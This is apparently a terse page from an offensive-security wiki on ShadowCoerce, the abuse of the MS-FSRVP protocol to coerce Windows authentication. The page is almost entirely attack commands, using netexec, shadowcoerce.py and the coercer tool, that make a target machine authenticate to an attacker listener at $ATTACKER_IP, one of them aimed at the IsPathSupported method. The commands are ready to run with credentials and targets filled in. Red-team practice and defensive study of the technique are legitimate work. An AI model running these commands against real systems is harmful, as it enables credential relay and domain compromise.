MS-FSRVP abuse (ShadowCoerce)
Theory

Practice
Resources
Last updated
netexec smb <TARGET> -u <USER> -p <PASSWORD> -M shadowcoerceshadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-FSRVP -l $ATTACKER_IP -t $TARGET_IP
# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name IsPathSupported -l $ATTACKER_IP -t $TARGET_IP